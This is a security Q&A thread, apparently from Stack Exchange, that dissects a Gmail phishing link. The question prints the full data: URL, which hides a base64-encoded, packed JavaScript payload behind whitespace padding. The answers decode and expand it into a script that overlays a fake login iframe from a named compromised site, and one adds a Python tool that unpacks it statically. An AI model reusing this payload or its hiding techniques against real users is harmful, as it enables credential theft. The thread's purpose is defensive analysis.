-1

I received an email from a colleague with an attached file that appeared to be on Google Drive, once clicked it led to the following URL, which recreates the Google account login page in order to steal passwords:

data:text/html,https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cscript%20src=data:text/html;base64,ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihjKXtyZXR1cm4gY307aWYoIScnLnJlcGxhY2UoL14vLFN0cmluZykpe3doaWxlKGMtLSl7ZFtjXT1rW2NdfHxjfWs9W2Z1bmN0aW9uKGUpe3JldHVybiBkW2VdfV07ZT1mdW5jdGlvbigpe3JldHVybidcXHcrJ307Yz0xfTt3aGlsZShjLS0pe2lmKGtbY10pe3A9cC5yZXBsYWNlKG5ldyBSZWdFeHAoJ1xcYicrZShjKSsnXFxiJywnZycpLGtbY10pfX1yZXR1cm4gcH0oJzMuMi4xNj0iMTUgMTQgMTMgMTcgMTgiOzIxeygyMCgpezE5IDE9My4yLjEyKFwnMVwnKTsxLjEwPVwnNy84LTZcJzsxLjExPVwnOSA2XCc7MS4yMj1cJ1wnOzIuMzEoXCczNFwnKVswXS4yMygxKX0oKSl9MzMoMzUpe30zLjIuMzYuMzc9Ijw0IDM5PVxcIjM4Oi8vMzIuMjYvMjUtMjQvXFwiIDI3PVxcIjI4OiAwOzMwOiA1JTsyOTo1JVxcIj48LzQ+IjsnLDEwLDQwLCd8bGlua3xkb2N1bWVudHx3aW5kb3d8aWZyYW1lfDEwMHxpY29ufGltYWdlfHh8c2hvcnRjdXR8dHlwZXxyZWx8Y3JlYXRlRWxlbWVudHxiZWVufGhhdmV8WW91fHRpdGxlfFNpZ25lZHxvdXR8dmFyfGZ1bmN0aW9ufHRyeXxocmVmfGFwcGVuZENoaWxkfGNvbnRlbnR8d3B8Y2x1YnxzdHlsZXxib3JkZXJ8aGVpZ2h0fHdpZHRofGdldEVsZW1lbnRzQnlUYWdOYW1lfGJsdWV2b2ljZXBnaHxjYXRjaHxoZWFkfGV8Ym9keXxvdXRlckhUTUx8aHR0cHxzcmMnLnNwbGl0KCd8JyksMCx7fSkpCg==%3E%3C/script%3E

From the script is there any way of identifying where the information is being sent, had I put in my email address and password?

The Guy with The Hat
  • 10,836
  • 8
  • 57
  • 75
Axel
  • 9
  • 1
  • 1

3 Answers

3

Let's break down the attack as far as we can:

It's a URL, starting off with the basic Gmail login link, which sets a few request variables to automatically log in if possible.

data:text/html,https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue

This is followed by a large amount of empty spaces, intended to hide the malicious payload from view in the browser address bar.

%20%20%20%20%20%20%20%20%20%20%20% (etc)

Now follows the payload for the victim. It's base64 encoded.

When we decode it, it looks like this:

eval(function (p, a, c, k, e, d)
{
    e = function (c)
    {
        return c
    };
    if (!''.replace(/^/, String))
    {
        while (c--)
        {
            d[c] = k[c] || c
        }
        k = [function (e)
            {
                return d[e]
            }
        ];
        e = function ()
        {
            return '\\w+'
        };
        c = 1
    };
    while (c--)
    {
        if (k[c])
        {
            p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
        }
    }
    return p
}
    ('3.2.16="15 14 13 17 18";21{(20(){19 1=3.2.12(\'1\');1.10=\'7/8-6\';1.11=\'9 6\';1.22=\'\';2.31(\'34\')[0].23(1)}())}33(35){}3.2.36.37="<4 39=\\"38://32.26/25-24/\\" 27=\\"28: 0;30: 5%;29:5%\\"></4>";', 10, 40, '|link|document|window|iframe|100|icon|image|x|shortcut|type|rel|createElement|been|have|You|title|Signed|out|var|function|try|href|appendChild|content|wp|club|style|border|height|width|getElementsByTagName|bluevoicepgh|catch|head|e|body|outerHTML|http|src'.split('|'), 0, {}
    ))

This is evil, obfuscated JavaScript. Do not execute it.

martinstoeckli's answer contains the expanded version of this script.

It sets the title of your current tab to mimic the 'you have been signed out' page of Gmail, and alters the page, adding a screen-filling iframe with no borders.

The iframe points at (what appears to be) a compromised WordPress site that contains a faked Gmail login page. Upon entering credentials into the fake page hosted on bluevoicepgh.club (someone might want to notify these people that their WordPress website is probably compromised), you are then redirected to the Gmail page that had silently logged you in in the background. This happens regardless of whether the credentials you entered into the fake login page were correct or not.

If you had indeed entered valid credentials into that page, there is no telling where it would have gone unless you could look at the script behind it.

Keep in mind that (thankfully) in its current form, the attack won't work properly since Google's login page uses HTTPS (and enforces use of HTTPS). As Chrome reminds us when the script is executed:

Mixed Content: The page at 'https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false…9keXxvdXRlckhUTUx8aHR0cHxzcmMnLnNwbGl0KCd8JyksMCx7fSkpCg==%3E%3C/script%3E' was loaded over HTTPS, but requested an insecure resource 'http://bluevoicepgh.club/wp-content/'. This request has been blocked; the content must be served over HTTPS.

Timothy Groote
  • 8,614
  • 26
  • 52
  • For those who are wondering after they pasted it into their browser: it's _safe_ now :). The domain is **closed** and it will not work. – Reyo Mar 30 '17 at 12:45
1

The script cannot work, because Google is sending x-frame-options = deny (it is up to the browser to respect this header), but the intention of the link seems to be this:

  • The %20 are blanks; this way one hopes to hide the content of the URL, because the following content could be outside the visible area.
  • The script itself tries to put the valid page into a (probably invisible) frame using the whole window. Whatever you click on this page can be intercepted by the malicious page.

Maybe someone wants to analyse the frame, but it should be done with care; the malicious domain is bluevoicepgh.

window.document.title = "You have been Signed out";
try {
    (function() {
        var link = window.document.createElement('link');
        link.type = 'image/x-icon';
        link.rel = 'shortcut icon';
        link.href = '';
        document.getElementsByTagName('head')[0].appendChild(link)
    }())
} catch (e) {}
window.document.body.outerHTML = "<iframe src=\"http://!!maliciousdomain!!.club/wp-content/\" style=\"border: 0;width: 100%;height:100%\"></iframe>";
martinstoeckli
  • 23,430
  • 6
  • 56
  • 87
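As an added example (not code from either answer), here is what Timothy Groote's decoding and martinstoeckli's expansion look like when done statically by a tool: the packer call is parsed out of the decoded payload text and the word substitution is reversed without ever evaluating the script, then the iframe target is extracted. The PACKED_JS text is transcribed from the decoded base64 shown above; the function names are my own, and the encoder is generalised to any radix the p,a,c,k,e,d packer can use, not just the base 10 seen here.

```python
import re

# Transcribed (minified) from the decoded base64 quoted in the answer; it is parsed here as data, never executed.
PACKED_JS = r'''eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}
('3.2.16="15 14 13 17 18";21{(20(){19 1=3.2.12(\'1\');1.10=\'7/8-6\';1.11=\'9 6\';1.22=\'\';2.31(\'34\')[0].23(1)}())}33(35){}3.2.36.37="<4 39=\\"38://32.26/25-24/\\" 27=\\"28: 0;30: 5%;29:5%\\"></4>";',
10,40,'|link|document|window|iframe|100|icon|image|x|shortcut|type|rel|createElement|been|have|You|title|Signed|out|var|function|try|href|appendChild|content|wp|club|style|border|height|width|getElementsByTagName|bluevoicepgh|catch|head|e|body|outerHTML|http|src'.split('|'),0,{}))'''

# The trailing call  }('<p>', a, c, '<k>'.split('|'), 0, {})  carries everything needed to unpack.
PACKER_CALL = re.compile(
    r"\}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)"
)
DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"

def js_unescape(s):
    # Undo the escapes of a single-quoted JS literal; this payload only uses \' and \\.
    return re.sub(r"\\(.)", r"\1", s)

def encode(n, radix):
    # Reproduce the packer's e(c): the base-`radix` token that stands for word number n.
    prefix = encode(n // radix, radix) if n >= radix else ""
    n %= radix
    return prefix + (chr(n + 29) if n > 35 else DIGITS[n])

def unpack(payload, radix, count, words):
    # Reverse the substitution: every word token that encodes an index becomes its dictionary word.
    table = {}
    for i in range(count):
        key = encode(i, radix)
        word = words[i] if i < len(words) else ""
        table[key] = word or key  # an empty slot means the token is literal (the 0 in 'border: 0')
    return re.sub(r"\b\w+\b", lambda m: table.get(m.group(0), m.group(0)), payload, flags=re.ASCII)

def unpack_source(js):
    # Locate the packer call in raw JS text and return the readable script.
    m = PACKER_CALL.search(js)
    if not m:
        raise ValueError("no eval(function(p,a,c,k,e,d){...}) call found")
    p, radix, count, k = m.groups()
    return unpack(js_unescape(p), int(radix), int(count), js_unescape(k).split("|"))

def frame_targets(js):
    # URLs the unpacked script loads into an <iframe>: the hosts worth blocking or reporting.
    return re.findall(r'<iframe[^>]*\bsrc=\\?"([^"\\]+)', js)

if __name__ == "__main__":
    readable = unpack_source(PACKED_JS)
    print(readable)
    print("frame targets:", frame_targets(readable))
```

Running it prints the same script martinstoeckli's answer shows, with the real host in place of the placeholder, and lists that host as the only frame target.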
0

The best way to figure it out is, when it prompts you to enter your credentials, to check which domain you are actually on. If it is a Google domain then it's OK; if not, then it's something related to phishing.

Here you should be very careful in checking the domain; the attackers play a trick: if the domain is google, they create something very similar, like gooogle or geogle. So carefully check the domain.

Nathan Rice
  • 3,091
  • 1
  • 20
  • 30